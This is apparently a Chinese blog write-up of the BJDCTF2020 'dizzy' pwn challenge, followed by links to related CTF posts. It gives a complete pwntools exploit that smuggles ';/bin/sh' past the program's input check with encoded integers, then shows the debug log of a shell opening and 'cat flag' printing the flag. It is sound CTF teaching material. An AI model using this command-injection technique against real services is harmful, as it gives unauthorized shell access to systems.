BJDCTF2020 dizzy

最新推荐文章于 2023-04-09 14:37:47 发布
最新推荐文章于 2023-04-09 14:37:47 发布
阅读量297 收藏
点赞数
分类专栏: ctfshow pwn详细wp 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39980610/article/details/126467671
版权

ida:

这题考察的是命令;分隔后前半段是错误的后面的仍可执行

还有字符串是用\x00截断的

但主要的是要看懂程序的检查机制

 

exp:

​

from pwn import *
context.log_level="debug"
io=remote("pwn.challenge.ctf.show", 28164)
elf=ELF("./dizzy")
s="PvvN| 1S S0 GREAT!;/bin/sh".ljust(80,"\x00")
arr=[]
for i in range(0,len(s),4):
    tmp=hex(ord(s[i+3]))[2:].zfill(2)
    tmp+= hex(ord(s[i + 2]))[2:].zfill(2)
    tmp+= hex(ord(s[i + 1]))[2:].zfill(2)
    tmp+= hex(ord(s[i + 0]))[2:].zfill(2)
    arr.append(int(tmp,16))
for i in range(len(arr)):
    arr[i]-=0x1BF52
for i in range(20):
	io.sendline(str(arr[i]))
io.interactive()


​
  io.sendline(str(arr[i]))
[DEBUG] Sent 0xb bytes:
    b'1316271870\n'
[DEBUG] Sent 0xb bytes:
    b'1395613994\n'
[DEBUG] Sent 0xa bytes:
    b'539923406\n'
[DEBUG] Sent 0xb bytes:
    b'1094947573\n'
[DEBUG] Sent 0xa bytes:
    b'792289794\n'
[DEBUG] Sent 0xa bytes:
    b'795650576\n'
[DEBUG] Sent 0x7 bytes:
    b'-87775\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[DEBUG] Sent 0x8 bytes:
    b'-114514\n'
[*] Switching to interactive mode
[DEBUG] Received 0x2c bytes:
    b'sh: 1: PvvN: not found\n'
    b'sh: 1: 1S: not found\n'
sh: 1: PvvN: not found
sh: 1: 1S: not found
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2e bytes:
    b'ctfshow{f56693d7-0a3d-4f15-b6a8-14864a26ce5a}\n'
ctfshow{f56693d7-0a3d-4f15-b6a8-14864a26ce5a}
$

whit233
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF——MISC习题讲解(BJDCTF2020系列)
tlovejr的博客
03-09 4238
CTF——MISC习题讲解(BJDCTF2020系列) 前言 上一章节我们已经做完一场比赛的杂项题目,这次给大家介绍一下BJDCTF中杂项题目 一、[BJDCTF2020]你猜我是个啥 题目链接如下: 链接:https://pan.baidu.com/s/1EG6lGSh2ZOwIdlrU2An50A?pwd=zuc2 提取码:zuc2 下载后是一个压缩包,但是打开也好还是解压也好都是无法打开 用文本编辑器查看发现其实这是一个图片 保存为图片后发现是一个二维码,扫描看看是不是flag 扫描后发现,这个二
PWN-PRACTICE-CTFSHOW-4
P1umH0的博客
01-16 684
PWN-PRACTICE-CTFSHOW-4BJDCTF2020-babyrouterBJDCTF2020-babystackBJDCTF2020-dizzyBJDCTF2020-encryptde stack BJDCTF2020-babyrouter 栈溢出,ret2libc # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.c
[原题复现]BJDCTF2020 WEB部分全部解
笑花大王
03-30 1389
简介 原题复现:https://gitee.com/xiaohua1998/BJDCTF2020_January 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 1.Easy MD5 1.涉及知识点:md5函数特性绕过、SQL注入 md5() md5() 函数计算字符串的 MD5 散列。 m...
[BJDCTF2020]Easy MD5
pakho_C的博客
02-08 1038
web第22题 [BJDCTF2020]Easy MD5 打开靶场: 查看源码: 就是一个单纯的form表单,get方式传参提交,所以无论提交任何数据页面都没有任何回显 使用burp抓包发送到repeater模块观察返回头 果然有发现,隐藏了一条sql查询 select * from 'admin' where password=md5($pass,true) 对于md5($pass,true),这位师傅解释的比较详细 [BJDCTF2020]Easy MD5 将第二个参数设置为true时,会将s
BJDCTF2020CRYPTO
ZBDX2113的博客
05-07 1130
这次做一些简单题,巩固一下基础 首先是ctfshow内部赛密码2 全文只给出了ctf和show两个单词,不是什么特殊字符,也不属于特殊解密,类似于这样的,可以想到摩斯密码,它是由-与.组成的,试着用ctf作.,show作-,敲完前四行编码,转换之后为flag,所以挨个敲就好了。 BJDCTF2020签到题 这种题目一般是归纳总结,仅有小写字母与数字组成的密文,我们可以想到MD5,hex,键盘密码等等,这道题使用的是hex编码,直接带入网站就好。 BJDCTF2020编码与调制 这
Dizzy Quest Editor-开源
04-27
DQE-是一个创建冒险或RPG 2D游戏的程序,就像“ DIZZY”系列一样。 它功能强大且易于使用的游戏编辑器。 支持俄语和英语。
github-university-2020
03-21
行动大学将于太平洋时间12月8日上午9:45到太平洋...通过在TwilioQuest的“设置” UI的“团队”部分中输入以下代码,加入GitHub Univers(ity)的“冒险团队”: ghuniversity2020 完成开源火焰任务! 请在12月10日太平
rajatdiptabiswas::dizzy:GitHub自述文件
02-24
评审门户::dizzy:starhacks评审门户
02-15
:dizzy: starhacks评审门户 对于后端 确保您已安装 cd backend go build go run main.go 对于前端 确保您已安装React cd frontend yarn start // Starts the development server. 其他命令 yarn build // Bundles ...
dizzy:网络和USB协议模糊测试工具包
04-29
dizzy是一个模糊测试框架,用python编写,并且能够通过很多输出选项进行全状态和无状态模糊测试。 用法 $dizzy_cmd version 2.0 running on Linux usage: dizzy_cmd [-h] [-s START_AT] [-d SEC] [-l] [-o OPTIONS] ...
[BJDCTF2020]rsa_output
最新发布
m0_74030040的博客
04-09 511
版权声明:本文为CSDN博主「JustGo12」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。我们首先审计题目,可以发现题目中给了我们两个c和不同的{n,e}值,所以我们可以推断本题为共模攻击题目。原文链接:https://blog.csdn.net/shshss64/article/details/127182144。两者相乘,通过扩展欧几里得定理,我们可知e1与e2互质,必存在s1和s2使e1*s1+e2*s2=1。由此可求出相对应的s1和s2.
BJD2020
pwnyuan's blog
10-22 792
BJDCTF 2020Beforewp这是base??easyrsaPolybiusrsa_outputRSAsignin1编码与调制伏羲六十四卦-- coding:UTF-8 ---*- coding:UTF-8 -*- Before BJD又来了一个比赛,但是当时我各种七七八八的事,没打,这是我事后在buu上复现的wp wp 这是base?? dict:{0: ‘J’, 1: ‘K’, 2: ‘L’, 3: ‘M’, 4: ‘N’, 5: ‘O’, 6: ‘x’, 7: ‘y’, 8: ‘U’, 9
ctfshow BJDCTF2020 encode wp
qq_73667990的博客
02-17 267
进入sub_8048AC2,base加密的代码看多了一眼就认出了这是base加密,蓝色的a0123456789Abcd就是密码表双击进入得到密码表。不知为何我的ida插件Findcrypto识别不出来Base和RC4加密。v5[18]是加密数据,v4是长度,v5是密钥,v3是v5长度。再进入sub_8048E24,是一个rc4加密。密钥v5=Flag{This_a_Flag}根据代码推测函数,鼠标放到函数上N键重命名。然后再base解密得到falg。可知RC4加密后的字符串为。得到了异或后的v5[18]
[BJDCTF 2020] EzPHP
weixin_51804748的博客
11-15 4585
前言 最近经常见到BJDCTF赛题的改版,其中有一道很经典的代码审计题目,写篇博客学习一下 https://github.com/BjdsecCA/BJDCTF2020 Part 1 (主页) 打开题目之后是一个网页,并没有和解题有关的信息 查看源代码后发现注释信息中有提示GFXEIM3YFZYGQ4A=,用base解码后得到信息1nD3x.php 访问/1nD3x.php得到源码 <?php highlight_file(__FILE__); error_reporting(0);
buuoj Pwn writeup 271-275
yongbaoii的博客
09-06 320
271 espcially_tu_2016 就是一个栈溢出。 但是这个题最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。 为了看看是scanf的问题还是ios_c99scanf的问题,做了个小实验。 编译的时候记得加-std=c89 但是发现scanf也是一样的效果。 就是会留下一个回车。 那我们试试读入字符串。 还是会有一个回车。 那我们下面再放一个scanf 再走第二个scanf的时候会刷新缓冲区的指针。 那如果放的是gets 跑程序的时
[BJDCTF2020]ZJCTF,不过如此 简单思路及做法
EC_Carrot的博客
12-07 851
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 稍微审计,发现需要读到文件内容为I have a dream,自然而然的就可以想到用伪协议来做题! 注释里提醒了next.php,我们同样用伪协议base64加密来读文件 data://text/plain, php://input 读到的内容解码出来 <?php $id = $_GET['id']; $_SESSION['id'] =
(RE)BUUCTF--[BJDCTF2020]BJD hamburger competition wp
苗_的博客
07-20 519
好久没有做到dnspy反编译的题了...这题是.NET写的程序(这个没深入了解过),具体参考Unity游戏逆向及破解方法介绍 先是找到Assembly-CSharp.dll文件(在Managed文件夹下),然后在ButtonSpawnFruit里找到主函数: 先解sha1得1001,然后md5,取前20位(注意flag要大写...) ...
BJDCTF-2020-WRITEUP---TiKi小组
pone2233的博客
03-23 2412
title: BJDCTF 2020 刷题记录 categories: CTF tags: BJDCTF CTF2020 BJDCTF Web duangShell 根据提示,输入.index.php.swp下载到源码。 之后在linux内输入vim -r index.php.swp即可看到源码 <!DOCTYPE html> <html lang="en"> &...
BJDCTF2020
Nobug_的博客
09-06 619
[BJDCTF2020]藏藏藏 打开题目后发现 直接打开下面的jpg文件 出现一个二维码 扫码得flag{you are the best!} [BJDCTF2020]鸡你太美 可以发现打开压缩包里面有两张gif图片 但是第一个gif图片打不开我们把它拖到010Editor 去查看 我们可以发现 第二个gif图片没有文件头 我们把GIF的文件头补齐 就可以拿到flag 47 49 46 38 添加过文件头之后就可以查看图片 flag{zhi_yin_you_are_beautiful} [BJD
怎么用c++判断眩晕数
04-03
假设眩晕数储存在一个名为“dizzy”的变量中,可以使用if语句来判断眩晕数的值。 例如,如果眩晕数大于等于3,则可以输出“角色已经晕倒”: ```c if(dizzy >= 3){ printf("角色已经晕倒"); } ``` 如果眩晕数...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值